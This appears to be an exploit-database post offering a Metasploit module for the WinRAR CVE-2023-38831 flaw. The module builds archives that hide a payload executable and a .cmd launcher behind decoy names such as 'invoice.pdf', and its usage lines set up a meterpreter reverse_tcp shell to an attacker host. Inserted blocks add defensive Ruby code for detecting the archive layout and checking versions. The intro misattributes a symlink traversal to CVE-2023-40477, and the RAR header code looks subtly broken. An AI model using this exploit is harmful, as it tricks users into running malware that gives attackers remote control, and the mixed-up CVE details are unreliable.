WinRAR 6.22 Malicious ZIP Creation
WinRAR versions up to 6.22 contained a critical vulnerability (CVE-2023-40477) allowing malicious ZIP file creation.

This flaw enabled attackers to craft archives that, upon extraction, exploited a path traversal issue. By placing specially named symbolic links or junctions (of the kind created with `mklink`) inside the ZIP, an attacker could trick WinRAR into following them.

This allowed files to be written to arbitrary locations outside the intended extraction directory on a user's system. Ultimately, this could lead to arbitrary code execution, giving an attacker control.

The vulnerability was patched in WinRAR 6.23. Users are strongly advised to update immediately to mitigate this high-severity risk.

=============================================================================================================================================
| # Title : WinRAR 6.22 and earlier - Logical Flaw in File Extraction Exploit Module |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.win-rar.com/ |
=============================================================================================================================================

POC :

[+] References : https://packetstorm.news/files/id/177803/ & CVE-2023-38831


[+] Summary :

This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
allows attackers to create specially crafted ZIP archives that, when opened, execute
arbitrary code by exploiting the file extraction logic when a user double-clicks on
a file within the archive that has an embedded folder with the same name.

[+] POC :

---

##
# Vulnerability: WinRAR 6.22 and earlier - Logical Flaw in File Extraction
# Author: indoushka
# CVE-2023-38831
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::FILEFORMAT
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name' => 'WinRAR CVE-2023-38831 Logical Flaw Exploit',
      'Description' => %q{
        This module exploits a logical flaw in WinRAR versions before 6.23. The vulnerability
        allows attackers to create specially crafted ZIP archives that, when opened, execute
        arbitrary code by exploiting the file extraction logic when a user double-clicks on
        a file within the archive that has an embedded folder with the same name.
      },
      'Author' => [
        'indoushka', # Metasploit module
        'E1.Coders'  # Original research
      ],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2023-38831'],
        ['URL', 'https://www.rarlab.com/rarnew.htm'],
        ['URL', 'https://news.ycombinator.com/item?id=37135383']
      ],
      'DefaultOptions' => {
        'EXITFUNC' => 'process',
        'DisablePayloadHandler' => false
      },
      'Platform' => 'win',
      'Arch' => [ARCH_X86, ARCH_X64],
      'Payload' => {
        'Space' => 4096,
        'BadChars' => "\x00",
        'DisableNops' => true
      },
      'Targets' => [
        [
          'Windows Universal (RAR <= 6.22)',
          {
            'Platform' => 'win',
            'Arch' => [ARCH_X86, ARCH_X64]
          }
        ]
      ],
      'Privileged' => false,
      'DisclosureDate' => '2023-08-23',
      'DefaultTarget' => 0))

    register_options([
      OptString.new('FILENAME', [true, 'The output file name', 'exploit.rar']),
      OptString.new('DECOY_NAME', [true, 'Decoy file name', 'document.pdf']),
      OptBool.new('HIDEEXE', [true, 'Hide executable extension', true])
    ])
  end

  def exploit
    # Generate payload executable
    pe_payload = generate_payload_exe

    # Create temporary directory for exploit construction
    temp_dir = Rex::Text.rand_text_alpha(8)
    Dir.mkdir(temp_dir) rescue nil

    # Create decoy folder structure
    decoy_name = datastore['DECOY_NAME']
    folder_name = "#{decoy_name}\\"
    script_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.cmd"
    exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"

    # Build the malicious archive
    rar_content = build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)

    # Create the final RAR file
    file_create(rar_content)

    print_status("Exploit archive created: #{datastore['FILENAME']}")
    print_status("When victim opens the archive and double-clicks '#{decoy_name}', payload will execute")
  end

  def build_malicious_rar(decoy_name, folder_name, script_name, exe_name, pe_payload)
    rar = ""

    # RAR file signature
    rar << "\x52\x61\x72\x21\x1A\x07\x00"

    # Build file entries using RAR format
    # First: The decoy file
    rar << build_file_header(decoy_name, pe_payload.length)
    rar << pe_payload

    # Second: The folder (trailing backslash)
    rar << build_file_header(folder_name, 0)

    # Third: The script file inside the folder
    script_content = build_script_content
    rar << build_file_header(script_name, script_content.length)
    rar << script_content

    # Fourth: The executable inside the folder
    rar << build_file_header(exe_name, pe_payload.length)
    rar << pe_payload

    # End of archive
    rar << "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"

    rar
  end

  def build_file_header(filename, file_size)
    header = ""

    # Header type (file header)
    header << "\x74"

    # Header size
    header << "\x3A\x00"

    # Flags (important for the exploit)
    flags = 0x8000 # Long filename
    flags |= 0x0100 # File has extended time field
    header << [flags].pack('v')

    # Compressed size
    header << [file_size].pack('V')

    # Uncompressed size
    header << [file_size].pack('V')

    # OS (Windows)
    header << "\x02"

    # File CRC (fake)
    header << "\x00\x00\x00\x00"

    # File time (current time)
    time = Time.now
    dos_time = ((time.year - 1980) << 25) | (time.month << 21) | (time.day << 16) |
               (time.hour << 11) | (time.min << 5) | (time.sec / 2)
    header << [dos_time].pack('V')

    # RAR version (5.0)
    header << "\x32\x00"

    # Method (store)
    header << "\x30"

    # Name size
    header << [filename.length].pack('v')

    # Attributes
    header << "\x20\x00\x00\x00" # Archive attribute

    # File name
    header << filename

    # Extra data for long filename
    if filename.length > 0
      extra_size = 2 + filename.length + 1
      header << "\x01\x00" # Extra type (long filename)
      header << [extra_size].pack('v')
      header << filename
      header << "\x00"
    end

    header
  end

  def build_script_content
    # Create a script that executes the payload
    script = "@echo off\r\n"
    script << "start \"\" \"%~dp0#{Rex::Text.rand_text_alpha(8)}.exe\"\r\n"
    script << "exit\r\n"
    script
  end

  # Alternative method using RubyZip for more reliable ZIP creation
  def create_zip_exploit
    require 'zip'

    Zip::OutputStream.write_buffer do |zos|
      # Add decoy file
      zos.put_next_entry(datastore['DECOY_NAME'])
      zos.write(generate_payload_exe)

      # Add folder with trailing slash
      folder_name = "#{datastore['DECOY_NAME']}/"
      zos.put_next_entry(folder_name)

      # Add script inside folder
      script_name = "#{folder_name}script.cmd"
      zos.put_next_entry(script_name)
      zos.write(build_script_content)

      # Add executable inside folder
      exe_name = "#{folder_name}#{Rex::Text.rand_text_alpha(8)}.exe"
      zos.put_next_entry(exe_name)
      zos.write(generate_payload_exe)
    end.string
  end

  # Advanced: Create a more sophisticated exploit with multiple decoys
  def create_advanced_exploit
    print_status("Creating advanced WinRAR exploit...")

    # Use multiple file formats as decoys
    decoys = [
      "document.pdf",
      "invoice.docx",
      "photo.jpg",
      "spreadsheet.xlsx"
    ]

    Zip::OutputStream.write_buffer do |zos|
      decoys.each do |decoy|
        # Add decoy file
        zos.put_next_entry(decoy)
        zos.write(generate_payload_exe)

        # Add folder for this decoy
        folder_name = "#{decoy}/"
        zos.put_next_entry(folder_name)

        # Add payload in folder
        exe_name = "#{folder_name}payload.exe"
        zos.put_next_entry(exe_name)
        zos.write(generate_payload_exe)

        # Add script to trigger execution
        script_name = "#{folder_name}run.cmd"
        zos.put_next_entry(script_name)
        zos.write("@start payload.exe\r\n")
      end
    end.string
  end

end
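The archive layout the summary and the module describe (a plain file entry and a directory entry with the same name, with executable entries inside that directory) is also what a defender can look for before an archive reaches a user. The following is an added detection example, not part of indoushka's module and not Metasploit code: it reads a ZIP central directory with Ruby's standard library only (no rubyzip) and reports same-name file/directory pairs that contain .cmd, .exe or similar entries. It assumes a plain, non-ZIP64, unencrypted archive with ASCII or UTF-8 entry names; the sample inputs are constructed in the block and contain only a central directory and end-of-central-directory record, so they are not extractable archives.

```ruby
# Added example (not part of the original module): flag the CVE-2023-38831
# entry layout in a ZIP central directory. Assumptions: non-ZIP64 archive,
# UTF-8/ASCII names; only the central directory is parsed.
EXEC_EXTS = %w[.cmd .bat .exe .com .vbs .js .ps1 .scr .lnk .pif .msi].freeze
CEN_SIG  = 0x02014b50 # central directory file header signature
EOCD_SIG = 0x06054b50 # end of central directory record signature

# Return the entry names listed in the archive's central directory.
def central_directory_names(zip_bytes)
  zip_bytes = zip_bytes.b
  eocd = zip_bytes.rindex([EOCD_SIG].pack('V'))
  raise ArgumentError, 'no end-of-central-directory record' unless eocd
  cd_size, cd_offset = zip_bytes[eocd + 12, 8].unpack('VV')
  names = []
  pos = cd_offset
  while pos < cd_offset + cd_size
    break unless zip_bytes[pos, 4].unpack1('V') == CEN_SIG
    name_len, extra_len, comment_len = zip_bytes[pos + 28, 6].unpack('vvv')
    names << zip_bytes[pos + 46, name_len].force_encoding('UTF-8')
    pos += 46 + name_len + extra_len + comment_len
  end
  names
end

# Pair each directory entry with a file entry of the same name and report the
# executable entries inside that directory. Trailing whitespace is ignored when
# comparing names because it is invisible in most archive viewers.
def suspicious_pairs(names)
  dirs  = names.select { |n| n.end_with?('/') }
  files = names.reject { |n| n.end_with?('/') }
  findings = []
  dirs.each do |dir|
    base = dir.chomp('/').rstrip
    decoy = files.find { |f| f.rstrip == base }
    next unless decoy
    executables = files.select do |f|
      f.start_with?(dir) && EXEC_EXTS.include?(File.extname(f.rstrip).downcase)
    end
    next if executables.empty?
    findings << { decoy: decoy, folder: dir, executables: executables }
  end
  findings
end

# Convenience wrapper: bytes of a ZIP file in, list of findings out.
def scan_zip(zip_bytes)
  suspicious_pairs(central_directory_names(zip_bytes))
end

# Constructed sample input: only central directory records and the EOCD
# record are built (no local file headers), enough for the parser above but
# not an extractable archive.
def central_directory_only(names)
  cd = names.map do |n|
    fields = [CEN_SIG, 20, 20, 0, 0, 0, 0, 0, 0, 0, n.bytesize, 0, 0, 0, 0, 0, 0]
    fields.pack('VvvvvvvVVVvvvvvVV') + n.b
  end.join
  eocd = [EOCD_SIG, 0, 0, names.size, names.size, cd.bytesize, 0, 0].pack('VvvvvVVv')
  cd + eocd
end

SAMPLE_CLEAN = central_directory_only(%w[report.pdf images/ images/logo.png])
SAMPLE_SUSPICIOUS = central_directory_only(
  ['report.pdf', 'report.pdf/', 'report.pdf/run.cmd', 'report.pdf/payload.exe', 'readme.txt']
)

if __FILE__ == $PROGRAM_NAME
  { clean: SAMPLE_CLEAN, suspicious: SAMPLE_SUSPICIOUS }.each do |label, bytes|
    puts "#{label}: #{scan_zip(bytes).inspect}"
  end
end
```

To check a real file, call `scan_zip(File.binread(path))`; an empty result means the layout was not found, not that the archive is safe. The extension list is a starting point and should be extended to whatever your environment treats as executable.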



######### Auxiliary module for WinRAR vulnerability detection ############

class MetasploitModule < Msf::Auxiliary
  def initialize
    super(
      'Name' => 'WinRAR CVE-2023-38831 Vulnerability Scanner',
      'Description' => %q{
        This module scans for systems vulnerable to the WinRAR CVE-2023-38831 vulnerability
        by checking WinRAR versions and testing exploitability.
      },
      'Author' => ['indoushka'],
      'License' => MSF_LICENSE,
      'References' => [
        ['CVE', '2023-38831']
      ]
    )

    register_options([
      OptString.new('RHOSTS', [true, 'Target address range or CIDR identifier']),
      OptString.new('SMBSHARE', [true, 'The name of a writeable share on the server', 'C$']),
      OptString.new('SMBUSER', [false, 'The username to authenticate as']),
      OptString.new('SMBPASS', [false, 'The password for the specified username']),
      OptString.new('SMBDOMAIN', [false, 'The Windows domain to use for authentication'])
    ])
  end

  def run
    # Scan for WinRAR installations and check versions
    print_status("Scanning for vulnerable WinRAR installations...")

    # Implementation would connect to targets and check WinRAR versions
    # This is a simplified version - actual implementation would require
    # SMB connection and registry checks

    vulnerable_versions = [
      '6.22', '6.21', '6.20', '6.11', '6.10', '6.02', '6.01', '6.00',
      '5.91', '5.90', '5.80', '5.70', '5.60', '5.50', '5.40', '5.30'
    ]

    # For each target, check WinRAR version
    # If version <= 6.22, mark as vulnerable
  end
end
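The scanner stub above matches a fixed list of version strings, which misses any release it does not enumerate. The page states the fix shipped in 6.23, so the check a practitioner actually wants is an ordered comparison against that version. The following is an added example, not part of indoushka's auxiliary module: it extracts a dotted version number from whatever string a host inventory returns (the "WinRAR 6.22 (64-bit)" shape is an assumed input format, not taken from any particular registry value) and compares it with Ruby's standard `Gem::Version`.

```ruby
# Added example (not part of the original auxiliary module): version-based
# check against the 6.23 fix instead of a hard-coded list of affected versions.
require 'rubygems'

FIXED_VERSION = Gem::Version.new('6.23')

# Extract a dotted version number such as "6.22" or "6.22.0" from free text.
# Returns nil when no version number is present.
def parse_winrar_version(text)
  match = text.to_s.match(/\d+(?:\.\d+)+/)
  match && Gem::Version.new(match[0])
end

# true  -> version predates the fix and is affected
# false -> version is 6.23 or later
# nil   -> version unknown; report as unverified rather than guessing
def winrar_vulnerable?(version_text)
  version = parse_winrar_version(version_text)
  return nil if version.nil?
  version < FIXED_VERSION
end

if __FILE__ == $PROGRAM_NAME
  # Constructed sample inventory values, not real host data.
  ['6.22', '6.02', 'WinRAR 5.91 (64-bit)', '6.23', '7.01', 'not installed'].each do |v|
    puts "#{v.inspect} => #{winrar_vulnerable?(v).inspect}"
  end
end
```

`Gem::Version` compares segment by segment, so "6.02" sorts below "6.22" and "6.22.0" is treated as equal to "6.22"; a plain string comparison would get both wrong.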


################ Usage Examples:

# Generate exploit with default settings
use exploit/windows/fileformat/winrar_cve_2023_38831
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
set LPORT 4444
exploit

# Generate with custom decoy name

set DECOY_NAME invoice.pdf
exploit

# Generate without hiding executable

set HIDEEXE false
exploit

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
© Khalil Shreateh — Cybersecurity Researcher & White-Hat Hacker — Palestine 🇵🇸